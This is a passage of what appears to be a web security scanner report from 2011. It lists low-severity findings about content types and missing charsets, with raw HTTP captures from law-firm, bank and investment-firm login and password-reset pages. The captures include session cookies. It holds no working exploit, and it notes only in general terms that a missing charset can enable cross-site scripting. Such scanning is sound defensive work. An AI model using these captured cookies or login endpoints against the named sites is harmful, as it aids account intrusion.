Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 73
Content-Type: text/html
Content-Location: https://ams-legal.net/tuckerellis/Default.htm
Last-Modified: Mon, 18 Oct 2010 19:35:54 GMT
Accept-Ranges: bytes
ETag: "f43deadfb6ecb1:173e8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:28 GMT

<html>
<meta http-equiv="REFRESH" CONTENT="0; URL=default.asp">
</html>

26.3. https://ams-legal.net/tuckerellis/Image.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/Image.asp

Request

Response

26.4. https://ams-legal.net/tuckerellis/blank.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/blank.htm

Request

GET /tuckerellis/blank.htm HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Mon, 18 Oct 2010 19:35:53 GMT
Accept-Ranges: bytes
ETag: "e5cea9adfb6ecb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>

</body>
</html>

26.5. https://cle-files.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cle-files.tuckerellis.com
Path:	/

Request

Response

26.6. https://cle-files.tuckerellis.com/password_reset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cle-files.tuckerellis.com
Path:	/password_reset

Request

Response

26.7. https://cle-files.tuckerellis.com/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cle-files.tuckerellis.com
Path:	/register

Request

Response

26.8. https://investor.kkr.com/Recovery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/Recovery.aspx

Request

GET /Recovery.aspx HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

26.9. https://investor.kkr.com/investor/login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/investor/login.html

Request

GET /investor/login.html HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2008 18:28:38 GMT
Accept-Ranges: bytes
ETag: "25223e29f439c91:1787"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:06:41 GMT

<body><script>
location.href="https://investor.kkr.com";
</script></body>

26.10. https://personal.vanguard.com/us/funds/snapshot previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://personal.vanguard.com
Path:	/us/funds/snapshot

Request

Response

26.11. https://services.sungarddx.com/admin/GetExternMedia.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/admin/GetExternMedia.aspx

Request

GET /admin/GetExternMedia.aspx?DN=161476,1,Documents&MediaGuid=b5c415d7-82b3-4f6f-88e6-32e0157b8f64 HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/default.aspx?DN=3483,1,Documents&CommunityDN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:05 GMT
Content-Length: 2937

GIF89a=."...................................................................................................z..u..s..k..i..e..a.._.Z{.Vx.Ps.Lp.Im.Ci.@f.<c.7_.6^.1Z.+U.'R}#O{!Mz.Jw.Gu.Et.Aq.?o=n :k.
...[SNIP]...

26.12. https://services.sungarddx.com/common/js/AdminFunctions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.sungarddx.com
Path:	/common/js/AdminFunctions.asp

Request

Response

26.13. https://virtualoffice.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://virtualoffice.tuckerellis.com
Path:	/

Request

Response

26.14. https://webmail-us.mimecast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail-us.mimecast.com
Path:	/

Request

GET / HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"210-1297546086000"
Last-Modified: Sat, 12 Feb 2011 21:28:06 GMT
Content-Type: text/html
Content-Length: 210
Date: Thu, 12 May 2011 12:34:16 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Redirecting</title>
<meta http-equiv="REFRESH" content="0;url=/webMail/login.jsp"></HEAD>
<BODY>
Redirecting
</BODY>
...[SNIP]...

26.15. https://ww3.janus.com/advisor/templates/blank.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/advisor/templates/blank.jsp

Request

GET /advisor/templates/blank.jsp HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310; WT_FPC=id=2083685a7025d04ca2e1305192254905:lv=1305192254905:ss=1305192254905

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: JSP/2.1
Content-Type: text/html
Content-Length: 0
Date: Thu, 12 May 2011 11:24:15 GMT

26.16. https://www.opalgroup.net/forms/info_request/info_request.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.opalgroup.net
Path:	/forms/info_request/info_request.php

Request

GET /forms/info_request/info_request.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:33 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 47178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

26.17. https://www.opalgroup.net/forms/register/register.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.opalgroup.net
Path:	/forms/register/register.php

Request

GET /forms/register/register.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: http://www.opalgroup.net/sponsorinfo.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:45 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Optimi
...[SNIP]...

26.18. https://www.opalgroup.net/forms/suggestions/suggestions.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.opalgroup.net
Path:	/forms/suggestions/suggestions.php

Request

GET /forms/suggestions/suggestions.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: https://www.opalgroup.net/forms/register/register.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:53 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

26.19. https://www.usaa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.usaa.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MemberGlobalSession=2:1002:4NZ4JENKZGDZY5ESDUSV; dcenv=DCITC

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Env: DCITC
Last-Modified: Wed, 19 Apr 2006 15:05:12 GMT
ETag: "15002c-876-fb79ba00"
Accept-Ranges: bytes
Content-Length: 2166
Content-Type: text/plain
Cache-Control: max-age=73169
Expires: Fri, 13 May 2011 07:43:50 GMT
Date: Thu, 12 May 2011 11:24:21 GMT
Connection: keep-alive

...... ..........&...........h.......(... ...@............................................................................................................................!....33.33.2!31"3....0.2..133
...[SNIP]...

26.20. https://www.wellsfargo.com/jump/theprivatebank/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/jump/theprivatebank/index

Request

Response

26.21. https://www.wellsfargo.com/pi_action/thePrivateBankFormAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/pi_action/thePrivateBankFormAction

Request

POST /pi_action/thePrivateBankFormAction HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/theprivatebank/contact_us
Cache-Control: max-age=0
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000
Content-Length: 211

firstName=&lastName=&city=&state=&zip=&phoneAreaCode=&phoneMidPart=&phoneLastPart=&bestTimeToCall=No+Preference&email=&currentLocation=&campaignId=CMP000038&waveId=WAV000376&lobId=WMG&leadFormId=TPB+M
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:13:40 GMT
Content-length: 10633
Content-type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Contact_us - The Private Bank<
...[SNIP]...

26.22. https://www.wellsfargo.com/theprivatebank/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/theprivatebank/

Request

GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:16 GMT
Content-length: 11996
Content-type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>The Private Bank ... W
...[SNIP]...

26.23. https://www.wellsfargo.com/theprivatebank/contact_us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.wellsfargo.com
Path:	/theprivatebank/contact_us

Request

GET /theprivatebank/contact_us HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/jump/theprivatebank/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:15 GMT
Content-length: 9817
Content-type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Contact_us - The Private Bank<
...[SNIP]...

27. HTML does not specify charset previous next
There are 42 instances of this issue:

http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3
http://ad.amtk-media.com/iframe
http://ads1.revenue.net/j
http://amch.questionmarket.com/adscgen/sta.php
https://ams-legal.net/support/Login.asp
https://ams-legal.net/support/LoginProcess.asp
https://ams-legal.net/support/blank.htm
https://ams-legal.net/support/default.asp
https://ams-legal.net/tuckerellis/
https://ams-legal.net/tuckerellis/Login.asp
https://ams-legal.net/tuckerellis/LoginProcess.asp
https://ams-legal.net/tuckerellis/blank.htm
https://ams-legal.net/tuckerellis/default.asp
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://dealbook.nytimes.com/svc/timespeople/bell.html
https://investor.kkr.com/investor/login.html
http://js.adsonar.com/js/pass.html
http://markets.on.nytimes.com/research/modules/dealbook_2010/dealbook.asp
http://odb.outbrain.com/utils/ping.html
http://ping.chartbeat.net/ping
https://services.sungarddx.com/admin/GetExternMedia.aspx
https://services.sungarddx.com/common/js/AdminFunctions.asp
http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros
http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html
http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00
http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc
http://topics.nytimes.com/svc/timespeople/bell.html
http://wd.sharethis.com/api/getCount2.php
https://webmail-us.mimecast.com/
https://webmail-us.mimecast.com/webMail/login.jsp
http://webmail.tuckerellis.com/
http://www.apolloic.com/public/home.asp
http://www.carlyle.com/favicon.ico
http://www.conferenceservers.com/browser/proxy.asp
http://www.managedfuturespecialist.com/favicon.ico
http://www.milbank.com/
http://www.milbank.com/clientweb/
http://www.milbank.com/clientweb/MTHM_main_bot.html
http://www.milbank.com/clientweb/MTHM_main_top.html
http://www.moritthock.com/index.php
http://www.nytimes.com/adx/bin/adx_remote.html
https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

27.1. http://ad-emea.doubleclick.net/adi/N568.273558.BLOOMBERG1/B3885816.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N568.273558.BLOOMBERG1/B3885816.3

Request

Response

27.2. http://ad.amtk-media.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Request

Response

27.3. http://ads1.revenue.net/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Request

Response

27.4. http://amch.questionmarket.com/adscgen/sta.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Request

GET /adscgen/sta.php?survey_num=909615&site=312253209&code=214693344 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1_200214693346-2-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1_887938-i]y(M-0_845473-pLz(M-0_908355-Tf/(M-0_907755-Pt<(M-0_855789-\l?(M-mn6_872313-xZ{(M-0_909615-)66)M-0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:15:52 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a210.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

27.5. https://ams-legal.net/support/Login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/Login.asp

Request

GET /support/Login.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/default.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2955
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:28 GMT
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

27.6. https://ams-legal.net/support/LoginProcess.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/LoginProcess.asp

Request

POST /support/LoginProcess.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/Login.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK; ASPSESSIONIDQSCDBTRB=HJGHIDNBKFGLLIOHFCIEAMGP
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

newPassword=True&userid=&email=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 162
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:52 GMT
Cache-control: private

<script type="text/javascript">
parent.MainPnl.userFocus();
parent.MainPnl.sendMessage('Reset Password Error', 'Invalid User ID or Email address');
</script>

27.7. https://ams-legal.net/support/blank.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/blank.htm

Request

Response

27.8. https://ams-legal.net/support/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/support/default.asp

Request

Response

27.9. https://ams-legal.net/tuckerellis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/

Request

Response

27.10. https://ams-legal.net/tuckerellis/Login.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/Login.asp

Request

Response

27.11. https://ams-legal.net/tuckerellis/LoginProcess.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ams-legal.net
Path:	/tuckerellis/LoginProcess.asp

Request

POST /tuckerellis/LoginProcess.asp HTTP/1.1
Host: ams-legal.net
